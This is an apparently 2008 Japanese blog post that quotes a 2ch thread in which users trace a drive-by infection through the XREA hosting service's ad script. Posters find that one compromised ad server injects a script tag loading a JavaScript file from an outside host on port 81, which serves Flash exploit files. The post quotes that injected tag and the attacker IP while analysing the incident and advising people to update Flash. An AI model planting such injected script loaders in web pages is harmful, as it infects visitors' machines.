xreaの広告から感染する件について

仕事中なので簡潔に。
注意されたし＞各位

xrea.com part131
http://pc11.2ch.net/test/read.cgi/hosting/1211121853/

504 ：名無しさん＠お腹いっぱい。 ：sage ：2008/06/08(日) 12:51:05 0
ちょっと聞いて欲しい。
無料のxreaの広告で、自動挿入じゃなくて自分で挿入する形式の奴あるよな。

<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com"></script>
<noscript><iframe height="60" width="468" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" allowtransparency="true" src="http://img.xrea.com/ad_iframe.fcg?site=xxx.sxxx.xrea.com">
<a href="http://img.xrea.com/ad_click.fcg?site=xxx.sxxx.xrea.com" target="_blank">
<img src="http://img.xrea.com/ad_img.fcg?site=xxx.sxxx.xrea.com" border="0" alt="xreaad"></a></iframe></noscript>

ってやつ。
これの<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com"></script>
が入ってると怪しげなIPにアクセスするんだが？
61.238.148.112 : 81
このIPは香港のIP。ぐぐると危険なIPっぽいんだが大丈夫なのか？
<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com">
を削除すると、広告はしっかり表示されるが、そのIPへのアクセスは無くなる。
自分以外のxrea借りてて<!--nobanner-->で広告位置変えてるサイトを見てみたが、
上のタグ入ってるサイトは全部そこへのアクセスがある。
<!--nobanner-->使わず自動挿入されるページはなんともないようだ。

604 ：名無しさん＠お腹いっぱい。 ：sage ：2008/06/11(水) 15:57:18 0
61.238.148.112ってhellh.netとかいう
ネトゲの垢盗むウィルス撒き散らしてる危険サイトのIPじゃない？
なんとなくググってみただけだけど

685 ：666 ：sage ：2008/06/12(木) 10:33:11 0
解析終了！

>>666で/show.phpってファイルにアクセスしてるけど
これがFlashプレーヤーの脆弱性を突いたファイルを読み込ませようとしてる。
????.swf、???.swfやらが脆弱性を突いたファイルだと思われる。

Flashプレーヤーを最新版にしてれば問題ないとは思う。
サポ板に誰か報告しといて。

686 ：666 ：sage ：2008/06/12(木) 10:40:04 0
ちなみにFlashプレーヤーのバージョン確認。
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

バージョンが9.0.124.0なら問題なし。
9.0.115.0以下だとヤバイかも。

694 ：666 ：sage ：2008/06/12(木) 11:53:55 0
>>690
XREA.COMがなんかしてるんじゃなくて
「imgj.xrea.com」が乗っ取られてる。

C:\>nslookup imgj.xrea.com
Non-authoritative answer:
Name: j1.ax.xrea.com
Addresses: 202.181.97.140, 202.229.187.26, 210.153.116.18, 202.229.187.26
59.106.22.138, 202.181.97.153
Aliases: imgj.xrea.com

719 ：名無しさん＠お腹いっぱい。 ：sage ：2008/06/12(木) 15:24:52 0
for i in 202.181.97.140 202.181.97.153 202.229.187.26 210.153.116.18 59.106.22.138; do
echo $i; wget -qO- http://${i}/ad_iframe.html | md5sum; echo
done

202.181.97.140
061a0dbc17873ef1d655093b47eb5a93 -

202.181.97.153
bae3970b24cad8473cef20d8b7cd0085 -

202.229.187.26
061a0dbc17873ef1d655093b47eb5a93 -

210.153.116.18
061a0dbc17873ef1d655093b47eb5a93 -

59.106.22.138
061a0dbc17873ef1d655093b47eb5a93 -

202.181.97.153 だけ返ってくる内容が違うんですよ

723 ：名無しさん＠お腹いっぱい。 ：sage ：2008/06/12(木) 15:44:45 0
http:// 202.181.97.150 /

http:// 202.181.97.153 /

http:// 202.181.97.153 /ad_iframe.html
<SCRIPT LANGUAGE="Javascript" SRC="http://****:81/jp.js"></SCRIPT>

http:// 202.181.97.156 /

前後のIPアドレスを持つホストは同一ネットワーク上に存在するだろうと推定すると、
特定のサーバ(202.181.97.153)の特定のページ(ad_iframe.html)だけに、
外部のJavaScriptファイルを実行するようなコードが挿入されています
つまりネットワークは無関係だということです
単に一つのサーバだけの問題です
事実をろくに検証もせずに一点だけ捉えてただどこが悪いだのと述べるのは、
警告でも何でもなくてただの風評ですよ
ARPSpoofingだとか無責任に言っていた人間は切腹なさい